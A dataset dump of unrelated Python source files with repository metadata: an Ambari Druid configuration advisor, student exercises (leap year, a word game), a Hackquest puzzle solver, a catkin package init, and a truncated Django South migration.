self.as_super.__init__(*args, **kwargs)
def recommendDruidConfigurationsFromHDP30(self, configurations,
clusterData, services, hosts):
# druid is not in list of services to be installed
if 'druid-common' not in services['configurations']:
return
componentsListList = [
service["components"] for service in services["services"]
]
componentsList = [
item["StackServiceComponents"] for sublist in componentsListList
for item in sublist
]
servicesList = [
service["StackServices"]["service_name"]
for service in services["services"]
]
putCommonProperty = self.putProperty(configurations, "druid-common",
services)
putCommonProperty('druid.zk.service.host',
self.getZKHostPortString(services))
self.recommendDruidMaxMemoryLimitConfigurations(
configurations, clusterData, services, hosts)
# recommending the metadata storage uri
database_name = services['configurations']["druid-common"][
"properties"]["database_name"]
metastore_hostname = services['configurations']["druid-common"][
"properties"]["metastore_hostname"]
database_type = services['configurations']["druid-common"][
"properties"]["druid.metadata.storage.type"]
metadata_storage_port = "1527"
mysql_module_name = "mysql-metadata-storage"
postgres_module_name = "postgresql-metadata-storage"
extensions_load_list = services['configurations']['druid-common'][
'properties']['druid.extensions.loadList']
putDruidCommonProperty = self.putProperty(configurations,
"druid-common", services)
extensions_load_list = self.removeFromList(extensions_load_list,
mysql_module_name)
extensions_load_list = self.removeFromList(extensions_load_list,
postgres_module_name)
if database_type == 'mysql':
metadata_storage_port = "3306"
extensions_load_list = self.addToList(extensions_load_list,
mysql_module_name)
if database_type == 'postgresql':
extensions_load_list = self.addToList(extensions_load_list,
postgres_module_name)
metadata_storage_port = "5432"
putDruidCommonProperty('druid.metadata.storage.connector.port',
metadata_storage_port)
putDruidCommonProperty(
'druid.metadata.storage.connector.connectURI',
self.getMetadataConnectionString(database_type).format(
metastore_hostname, database_name, metadata_storage_port))
# HDFS is installed
if "HDFS" in servicesList and "hdfs-site" in services["configurations"]:
# recommend HDFS as default deep storage
extensions_load_list = self.addToList(extensions_load_list,
"druid-hdfs-storage")
putCommonProperty("druid.storage.type", "hdfs")
putCommonProperty("druid.storage.storageDirectory",
"/druid/storage")
# configure indexer logs configs
putCommonProperty("druid.indexer.logs.type", "hdfs")
putCommonProperty("druid.indexer.logs.directory", "/logs/druid")
if "CONFLUENT" in servicesList:
extensions_load_list = self.addToList(
extensions_load_list, "druid-kafka-indexing-service")
if 'AMBARI_METRICS' in servicesList:
extensions_load_list = self.addToList(extensions_load_list,
"ambari-metrics-emitter")
putCommonProperty('druid.extensions.loadList', extensions_load_list)
# JVM Configs go to env properties
putEnvProperty = self.putProperty(configurations, "druid-env",
services)
# processing thread pool and memory configs
for component in ['DRUID_HISTORICAL', 'DRUID_BROKER']:
component_hosts = self.getHostsWithComponent(
"DRUID", component, services, hosts)
nodeType = self.DRUID_COMPONENT_NODE_TYPE_MAP[component]
putComponentProperty = self.putProperty(configurations,
format("druid-{nodeType}"),
services)
if (component_hosts is not None and len(component_hosts) > 0):
totalAvailableCpu = self.getMinCpu(component_hosts)
processingThreads = 1
if totalAvailableCpu > 1:
processingThreads = totalAvailableCpu - 1
numMergeBuffers = max(2, processingThreads / 4)
putComponentProperty('druid.processing.numThreads',
processingThreads)
putComponentProperty(
'druid.server.http.numThreads',
max(10, (totalAvailableCpu * 17) / 16 + 2) + 30)
putComponentProperty('druid.processing.numMergeBuffers',
numMergeBuffers)
totalAvailableMemInMb = self.getMinMemory(
component_hosts) / 1024
maxAvailableBufferSizeInMb = totalAvailableMemInMb / (
processingThreads + numMergeBuffers)
putComponentProperty(
'druid.processing.buffer.sizeBytes',
self.getDruidProcessingBufferSizeInMb(
maxAvailableBufferSizeInMb) * 1024 * 1024)
# returns the recommended druid processing buffer size in Mb.
# the recommended buffer size is kept lower then the max available memory to have enough free memory to load druid data.
# for low memory nodes, the actual allocated buffer size is small to keep some free memory for memory mapping of segments
# If user installs all druid processes on a single node, memory available for loading segments will be further decreased.
def getDruidProcessingBufferSizeInMb(self, maxAvailableBufferSizeInMb):
if maxAvailableBufferSizeInMb <= 256:
return min(64, maxAvailableBufferSizeInMb)
elif maxAvailableBufferSizeInMb <= 1024:
return 128
elif maxAvailableBufferSizeInMb <= 2048:
return 256
elif maxAvailableBufferSizeInMb <= 6144:
return 512
# High Memory nodes below
else:
return 1024
def getMetadataConnectionString(self, database_type):
driverDict = {
'mysql': 'jdbc:mysql://{0}:{2}/{1}?createDatabaseIfNotExist=true',
'derby': 'jdbc:derby://{0}:{2}/{1};create=true',
'postgresql': 'jdbc:postgresql://{0}:{2}/{1}'
}
return driverDict.get(database_type.lower())
def addToList(self, json_list, word):
desr_list = json.loads(json_list)
if word not in desr_list:
desr_list.append(word)
return json.dumps(desr_list)
def removeFromList(self, json_list, word):
desr_list = json.loads(json_list)
if word in desr_list:
desr_list.remove(word)
return json.dumps(desr_list)
def recommendDruidMaxMemoryLimitConfigurations(
self, configurations, clusterData, services, hosts):
putEnvPropertyAttribute = self.putPropertyAttribute(
configurations, "druid-env")
for component in [
"DRUID_HISTORICAL", "DRUID_MIDDLEMANAGER", "DRUID_BROKER",
"DRUID_OVERLORD", "DRUID_COORDINATOR"
]:
component_hosts = self.getHostsWithComponent(
"DRUID", component, services, hosts)
if component_hosts is not None and len(component_hosts) > 0:
totalAvailableMem = self.getMinMemory(
component_hosts) / 1024 # In MB
nodeType = self.DRUID_COMPONENT_NODE_TYPE_MAP[component]
putEnvPropertyAttribute(
format('druid.{nodeType}.jvm.heap.memory'), 'maximum',
max(totalAvailableMem, 1024))
DRUID_COMPONENT_NODE_TYPE_MAP = {
'DRUID_BROKER': 'broker',
'DRUID_COORDINATOR': 'coordinator',
'DRUID_HISTORICAL': 'historical',
'DRUID_MIDDLEMANAGER': 'middlemanager',
'DRUID_OVERLORD': 'overlord',
'DRUID_ROUTER': 'router'
}
def getMinMemory(self, component_hosts):
min_ram_kb = 1073741824 # 1 TB
for host in component_hosts:
ram_kb = host['Hosts']['total_mem']
min_ram_kb = min(min_ram_kb, ram_kb)
return min_ram_kb
def getMinCpu(self, component_hosts):
min_cpu = 256
for host in component_hosts:
cpu_count = host['Hosts']['cpu_count']
min_cpu = min(min_cpu, cpu_count)
return min_cpu
class DruidValidator(service_advisor.ServiceAdvisor):
"""
Druid Validator checks the correctness of properties whenever the service is first added or the user attempts to
change configs via the UI.
"""
def __init__(self, *args, **kwargs):
self.as_super = super(DruidValidator, self)
self.as_super.__init__(*args, **kwargs)
self.validators = [
("druid-env", self.validateDruidEnvConfigurationsFromHDP30),
("druid-historical",
self.validateDruidHistoricalConfigurationsFromHDP30),
("druid-broker", self.validateDruidBrokerConfigurationsFromHDP30)
]
def validateDruidEnvConfigurationsFromHDP30(
self, properties, recommendedDefaults, configurations, services,
hosts):
validationItems = []
# Minimum Direct memory Validation
envProperties = services['configurations']['druid-env']['properties']
for nodeType in ['broker', 'historical']:
properties = services['configurations'][format(
'druid-{nodeType}')]['properties']
intermediateBufferSize = int(
properties['druid.processing.buffer.sizeBytes']) / (1024 * 1024
) # In MBs
processingThreads = int(properties['druid.processing.numThreads'])
directMemory = int(
envProperties[format('druid.{nodeType}.jvm.direct.memory')])
if directMemory < (processingThreads + 1) * intermediateBufferSize:
validationItems.extend({
"config-name":
format("druid.{nodeType}.jvm.direct.memory"),
"item":
self.getErrorItem(
format(
"Not enough direct memory available for {nodeType} Node."
"Please adjust druid.{nodeType}.jvm.direct.memory, druid.processing.buffer.sizeBytes, druid.processing.numThreads"
))
})
return self.toConfigurationValidationProblems(validationItems,
"druid-env")
def validateDruidHistoricalConfigurationsFromHDP30(
self, properties, recommendedDefaults, configurations, services,
hosts):
validationItems = [{
"config-name":
"druid.processing.numThreads",
"item":
self.validatorEqualsToRecommendedItem(
properties, recommendedDefaults, "druid.processing.numThreads")
}]
return self.toConfigurationValidationProblems(validationItems,
"druid-historical")
def validateDruidBrokerConfigurationsFromHDP30(
self, properties, recommendedDefaults, configurations, services,
hosts):
validationItems = [{
"config-name":
"druid.processing.numThreads",
"item":
self.validatorEqualsToRecommendedItem(
properties, recommendedDefaults, "druid.processing.numThreads")
}]
return self.toConfigurationValidationProblems(validationItems,
"druid-broker")
| [
"[email protected]"
] | |
e000797abae0baf2ef7c3b2faedebcc2cf39dbd4 | 98c6ea9c884152e8340605a706efefbea6170be5 | /examples/data/Assignment_2/jblmuz001/question1.py | 2a078b63ff7024e2ae2a73d45ec3628af59c4b52 | [] | no_license | MrHamdulay/csc3-capstone | 479d659e1dcd28040e83ebd9e3374d0ccc0c6817 | 6f0fa0fa1555ceb1b0fb33f25e9694e68b6a53d2 | refs/heads/master | 2021-03-12T21:55:57.781339 | 2014-09-22T02:22:22 | 2014-09-22T02:22:22 | 22,372,174 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 187 | py | #Question 1
import math
x=eval(input("Enter a year:\n"))
if(x%400==0 or (x%4==0 and x%100!=0)):
print(x, "is a leap year.")
else:
print(x, "is not a leap year.")
| [
"[email protected]"
] | |
c466266df26b42152c21f2fafa8ea9251a2c1683 | cd014fae6791f51a9a382f34dbdcee6d61d84e30 | /62_From_the_border_of_hell/62.py | 6e0657bcb1f623ade641513504631b8ec63c4cef | [
"Apache-2.0"
] | permissive | ckclark/Hackquest | 1505f50fc2c735db059205d1c9bbba1832cc5059 | 65ed5fd32e79906c0e36175bbd280d976c6134bd | refs/heads/master | 2021-01-16T19:32:29.434790 | 2015-09-29T13:39:04 | 2015-09-29T13:39:04 | 42,388,846 | 13 | 5 | null | null | null | null | UTF-8 | Python | false | false | 665 | py | question = [
'''Toni, I write you this letter tonight with''',
'''ebony pen and ink, to show my deep love''',
'''and to give you my advise. If you pack your bag''',
'''later tonight, do not feel responsible for future''',
'''happenings, as they aren't your fault. Even, if a''',
'''small part inside of you may think like that. All''',
'''alternatives are equally bad. Just make sure sin''',
'''doesn't conquer your life, and, please''',
'''don't have unprotected sex with Mary Ann in the car late at night!''',
]
ans = []
for s in question:
ans.append(s[0])
ans.append(s[-1])
print ''.join(ans)
# The eagle has landed!
| [
"[email protected]"
] | |
7ad1139df56926c27e7758e42935202a504b94cb | cb5093d193352c521dcc60da62dd8fc8a3564231 | /devel/lib/python2.7/dist-packages/rqt_multiplot/__init__.py | bf5cb228f8bf0f85959b0386f71f9ff7b566ee4d | [] | no_license | ElliWhite/proj515_ws | 85555dbad029d7fd10c8ffbfb8352b9cd7b4db53 | ce51e547f2f4761850cef9116a85a34b232160c6 | refs/heads/master | 2020-04-23T22:11:59.284827 | 2019-05-24T16:46:30 | 2019-05-24T16:46:30 | 171,493,779 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,054 | py | # -*- coding: utf-8 -*-
# generated from catkin/cmake/template/__init__.py.in
# keep symbol table as clean as possible by deleting all unnecessary symbols
from os import path as os_path
from sys import path as sys_path
from pkgutil import extend_path
__extended_path = "/home/elliottwhite/proj515_ws/src/rqt_multiplot_plugin/rqt_multiplot/src".split(";")
for p in reversed(__extended_path):
sys_path.insert(0, p)
del p
del sys_path
__path__ = extend_path(__path__, __name__)
del extend_path
__execfiles = []
for p in __extended_path:
src_init_file = os_path.join(p, __name__ + '.py')
if os_path.isfile(src_init_file):
__execfiles.append(src_init_file)
else:
src_init_file = os_path.join(p, __name__, '__init__.py')
if os_path.isfile(src_init_file):
__execfiles.append(src_init_file)
del src_init_file
del p
del os_path
del __extended_path
for __execfile in __execfiles:
with open(__execfile, 'r') as __fh:
exec(__fh.read())
del __fh
del __execfile
del __execfiles
| [
"[email protected]"
] | |
47cf68700b1912f0b319902af3bfc5e6fe42400a | a51b1814a9bf2fdcf880772fefaa2ab79e8c7308 | /Week_4/temp.py | 23e9119e3f467e0eb050e0b5e9513f068e1edacd | [
"Giftware"
] | permissive | 369geofreeman/MITx_6.00.1x | d38913805168440969034e1d82611b0dbcd7a29a | ba84f70cc4e7cfbd4b685b742aa87d3f85cbbf59 | refs/heads/master | 2023-04-21T01:55:08.538290 | 2021-05-13T13:03:50 | 2021-05-13T13:03:50 | 282,055,845 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,759 | py | # The 6.00 Word Game
import random
import string
VOWELS = 'aeiou'
CONSONANTS = 'bcdfghjklmnpqrstvwxyz'
HAND_SIZE = 7
SCRABBLE_LETTER_VALUES = {
'a': 1, 'b': 3, 'c': 3, 'd': 2, 'e': 1, 'f': 4, 'g': 2, 'h': 4, 'i': 1, 'j': 8, 'k': 5, 'l': 1, 'm': 3, 'n': 1, 'o': 1, 'p': 3, 'q': 10, 'r': 1, 's': 1, 't': 1, 'u': 1, 'v': 4, 'w': 4, 'x': 8, 'y': 4, 'z': 10
}
# -----------------------------------
# Helper code
# (you don't need to understand this helper code)
WORDLIST_FILENAME = "words.txt"
def loadWords():
"""
Returns a list of valid words. Words are strings of lowercase letters.
Depending on the size of the word list, this function may
take a while to finish.
"""
print("Loading word list from file...")
# inFile: file
inFile = open(WORDLIST_FILENAME, 'r')
# wordList: list of strings
wordList = []
for line in inFile:
wordList.append(line.strip().lower())
print(" ", len(wordList), "words loaded.")
return wordList
def getFrequencyDict(sequence):
"""
Returns a dictionary where the keys are elements of the sequence
and the values are integer counts, for the number of times that
an element is repeated in the sequence.
sequence: string or list
return: dictionary
"""
# freqs: dictionary (element_type -> int)
freq = {}
for x in sequence:
freq[x] = freq.get(x,0) + 1
return freq
# (end of helper code)
# -----------------------------------
#
# Problem #1: Scoring a word
#
def getWordScore(word, n):
"""
Returns the score for a word. Assumes the word is a valid word.
The score for a word is the sum of the points for letters in the
word, multiplied by the length of the word, PLUS 50 points if all n
letters are used on the first turn.
Letters are scored as in Scrabble; A is worth 1, B is worth 3, C is
worth 3, D is worth 2, E is worth 1, and so on (see SCRABBLE_LETTER_VALUES)
word: string (lowercase letters)
n: integer (HAND_SIZE; i.e., hand size required for additional points)
returns: int >= 0
"""
wordScore = 0
if len(word) == 0:
return 0
else:
for i in word:
if i in SCRABBLE_LETTER_VALUES:
wordScore += SCRABBLE_LETTER_VALUES[i]
wordScore *= len(word)
if len(word) >= n:
wordScore += 50
return wordScore
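# For example (worked through with the letter values above): getWordScore('weed', 7)
# scores w+e+e+d = 4+1+1+2 = 8, multiplied by len('weed') = 4, giving 32; the 50-point
# bonus is not added because only 4 of the 7 hand letters were used.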
#
# Problem #2: Make sure you understand how this function works and what it does!
#
def displayHand(hand):
"""
Displays the letters currently in the hand.
For example:
>>> displayHand({'a':1, 'x':2, 'l':3, 'e':1})
Should print out something like:
a x x l l l e
The order of the letters is unimportant.
hand: dictionary (string -> int)
"""
for letter in hand.keys():
for j in range(hand[letter]):
print(letter,end=" ") # print all on the same line
print() # print an empty line
#
# Problem #2: Make sure you understand how this function works and what it does!
#
def dealHand(n):
"""
Returns a random hand containing n lowercase letters.
At least n/3 the letters in the hand should be VOWELS.
Hands are represented as dictionaries. The keys are
letters and the values are the number of times the
particular letter is repeated in that hand.
n: int >= 0
returns: dictionary (string -> int)
"""
hand={}
numVowels = n // 3
for i in range(numVowels):
x = VOWELS[random.randrange(0,len(VOWELS))]
hand[x] = hand.get(x, 0) + 1
for i in range(numVowels, n):
x = CONSONANTS[random.randrange(0,len(CONSONANTS))]
hand[x] = hand.get(x, 0) + 1
return hand
#
# Problem #2: Update a hand by removing letters
#
def updateHand(hand, word):
"""
Assumes that 'hand' has all the letters in word.
In other words, this assumes that however many times
a letter appears in 'word', 'hand' has at least as
many of that letter in it.
Updates the hand: uses up the letters in the given word
and returns the new hand, without those letters in it.
Has no side effects: does not modify hand.
word: string
hand: dictionary (string -> int)
returns: dictionary (string -> int)
"""
newHand = hand.copy()
for k in word:
if k in newHand:
newHand[k] -= 1
return newHand
#
# Problem #3: Test word validity
#
def isValidWord(word, hand, wordList):
"""
Returns True if word is in the wordList and is entirely
composed of letters in the hand. Otherwise, returns False.
Does not mutate hand or wordList.
word: string
hand: dictionary (string -> int)
wordList: list of lowercase strings
"""
newHand = hand.copy()
if word in wordList:
for k in word:
if k in newHand and newHand[k] > 0:
newHand[k] -= 1
else:
return False
return True
else:
return False
#
# Problem #4: Playing a hand
#
def calculateHandlen(hand):
"""
Returns the length (number of letters) in the current hand.
hand: dictionary (string-> int)
returns: integer
"""
count = 0
for i in hand:
count += hand[i]
return count
def playHand(hand, wordList, n):
"""
Allows the user to play the given hand, as follows:
* The hand is displayed.
* The user may input a word or a single period (the string ".")
to indicate they're done playing
* Invalid words are rejected, and a message is displayed asking
the user to choose another word until they enter a valid word or "."
* When a valid word is entered, it uses up letters from the hand.
* After every valid word: the score for that word is displayed,
the remaining letters in the hand are displayed, and the user
is asked to input another word.
* The sum of the word scores is displayed when the hand finishes.
* The hand finishes when there are no more unused letters or the user
inputs a "."
hand: dictionary (string -> int)
wordList: list of lowercase strings
n: integer (HAND_SIZE; i.e., hand size required for additional points)
"""
# Keep track of the total score
score = 0
# As long as there are still letters left in the hand:
while calculateHandlen(hand) > 0:
# Display the hand
displayHand(hand)
# Ask user for input
word = input("Enter word, or a '.' to indicate that you are finished: ")
# If the input is a single period:
if word == '.':
# End the game (break out of the loop)
return "Goodbye! Total score: {} points.".format(score)
# Otherwise (the input is not a single period):
else:
            # If the word is not valid (not in the word list, or not composable from the letters in the hand):
            if not isValidWord(word, hand, wordList):
                # Reject invalid word (print a message followed by a blank line)
                print("Invalid word, please try again.\n \n")
            # Otherwise (the word is valid):
            else:
                # Tell the user how many points the word earned, and the updated total score, in one line followed by a blank line
                p = getWordScore(word, n)
                score += p
                print('"{}" earned {} points. Total: {} points \n'.format(word, p, score))
                # Update the hand
                hand = updateHand(hand, word)
# Game is over (user entered a '.' or ran out of letters), so tell user the total score
if calculateHandlen(hand) == 0:
return "Run out of letters. Total score: {} points.".format(score)
else:
return "Goodbye! Total score: {} points.".format(score)
#
# Problem #5: Playing a game
#
def playGame(wordList):
"""
Allow the user to play an arbitrary number of hands.
1) Asks the user to input 'n' or 'r' or 'e'.
* If the user inputs 'n', let the user play a new (random) hand.
* If the user inputs 'r', let the user play the last hand again.
* If the user inputs 'e', exit the game.
* If the user inputs anything else, tell them their input was invalid.
    2) When done playing the hand, repeat from step 1
    """
    # Minimal implementation of the docstring: 'n' deals a new hand, 'r' replays the last hand, 'e' exits.
    hand = None
    while True:
        choice = input("Enter n to deal a new hand, r to replay the last hand, or e to end game: ")
        if choice == 'e':
            break
        elif choice == 'n':
            hand = dealHand(HAND_SIZE)
            print(playHand(dict(hand), wordList, HAND_SIZE))
        elif choice == 'r' and hand is not None:
            print(playHand(dict(hand), wordList, HAND_SIZE))
        else:
            print("Invalid command.")
#
# Build data structures used for entire session and play game
#
if __name__ == '__main__':
wordList = loadWords()
playGame(wordList)
| [
"[email protected]"
] | |
94b007996f60108dece620a6671baaa1f9ce2de4 | 18dba2f82e17873e5e8161e74bc714ef88b09b36 | /realestate/devrep/migrations/0012_auto__del_field_address_estate_number__add_field_address_address.py | 466d9a20feacbe56de9b322f7b3f3a05d2d569eb | [] | no_license | sanchellius/estate-agent | 8013573624b62ea3b6362fa0c22edf8371ca6966 | 53c15c2f2c970bd432ae579b5aa6f76ab2fbac49 | refs/heads/master | 2021-01-17T21:15:35.988578 | 2016-07-25T21:51:24 | 2016-07-25T21:51:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 22,297 | py | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'Address.estate_number'
db.delete_column('devrep_address', 'estate_number')
# Adding field 'Address.address'
db.add_column('devrep_address', 'address',
self.gf('django.db.models.fields.CharField')(max_length=50, null=True, blank=True),
keep_default=False)
def backwards(self, orm):
# Adding field 'Address.estate_number'
db.add_column('devrep_address', 'estate_number',
self.gf('django.db.models.fields.CharField')(max_length=10, null=True, blank=True),
keep_default=False)
# Deleting field 'Address.address'
db.delete_column('devrep_address', 'address')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'devrep.address': {
'Meta': {'ordering': "['id']", 'object_name': 'Address'},
'address': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'locality': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['estatebase.Locality']", 'null': 'True', 'on_delete': 'models.PROTECT', 'blank': 'True'}),
'microdistrict': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['estatebase.Microdistrict']", 'null': 'True', 'on_delete': 'models.PROTECT', 'blank': 'True'}),
'region': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['estatebase.Region']", 'on_delete': 'models.PROTECT'}),
'street': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['estatebase.Street']", 'null': 'True', 'on_delete': 'models.PROTECT', 'blank': 'True'})
},
'devrep.citizenship': {
'Meta': {'ordering': "['name']", 'object_name': 'Citizenship'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'})
},
'devrep.clientpartner': {
'Meta': {'unique_together': "(('client', 'partner'),)", 'object_name': 'ClientPartner'},
'client': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['estatebase.Client']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'partner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['devrep.Partner']"}),
'partner_client_status': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['devrep.PartnerClientStatus']"})
},
'devrep.devprofile': {
'Meta': {'object_name': 'DevProfile'},
'coverage_localities': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'person_coverage'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['estatebase.Locality']"}),
'coverage_regions': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'person_coverage'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['estatebase.Region']"}),
'experience': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['devrep.Experience']", 'null': 'True', 'blank': 'True'}),
'gears': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'owners'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['devrep.Gear']"}),
'has_transport': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'note': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'quality': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['devrep.Quality']", 'null': 'True', 'blank': 'True'}),
'work_types': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['devrep.WorkType']", 'null': 'True', 'through': "orm['devrep.WorkTypeProfile']", 'blank': 'True'})
},
'devrep.experience': {
'Meta': {'ordering': "['name']", 'object_name': 'Experience'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'})
},
'devrep.extraprofile': {
'Meta': {'object_name': 'ExtraProfile'},
'address': ('django.db.models.fields.related.OneToOneField', [], {'blank': 'True', 'related_name': "'extra_profile'", 'unique': 'True', 'null': 'True', 'to': "orm['devrep.Address']"}),
'bad_habits': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'birthday': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'birthplace': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True', 'blank': 'True'}),
'citizenship': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['devrep.Citizenship']", 'null': 'True', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'gender': ('django.db.models.fields.CharField', [], {'default': "'M'", 'max_length': '1', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'passport_number': ('django.db.models.fields.CharField', [], {'max_length': '6', 'null': 'True', 'blank': 'True'}),
'passport_series': ('django.db.models.fields.CharField', [], {'max_length': '4', 'null': 'True', 'blank': 'True'}),
'patronymic': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'pc_skills': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'progress': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
'devrep.gear': {
'Meta': {'ordering': "['name']", 'object_name': 'Gear'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'}),
'note': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
},
'devrep.measure': {
'Meta': {'ordering': "['name']", 'object_name': 'Measure'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'})
},
'devrep.partner': {
'Meta': {'ordering': "['name']", 'object_name': 'Partner'},
'address': ('django.db.models.fields.related.OneToOneField', [], {'blank': 'True', 'related_name': "'partner'", 'unique': 'True', 'null': 'True', 'to': "orm['devrep.Address']"}),
'clients': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['estatebase.Client']", 'null': 'True', 'through': "orm['devrep.ClientPartner']", 'blank': 'True'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'history': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['estatebase.HistoryMeta']", 'unique': 'True', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'note': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['devrep.Partner']"}),
'partner_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'partner'", 'to': "orm['devrep.PartnerType']"}),
'person_count': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'devrep.partnerclientstatus': {
'Meta': {'ordering': "['name']", 'object_name': 'PartnerClientStatus'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'})
},
'devrep.partnertype': {
'Meta': {'ordering': "['name']", 'object_name': 'PartnerType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'})
},
'devrep.quality': {
'Meta': {'ordering': "['name']", 'object_name': 'Quality'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255', 'db_index': 'True'})
},
'devrep.worktype': {
'Meta': {'ordering': "['name']", 'object_name': 'WorkType'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}),
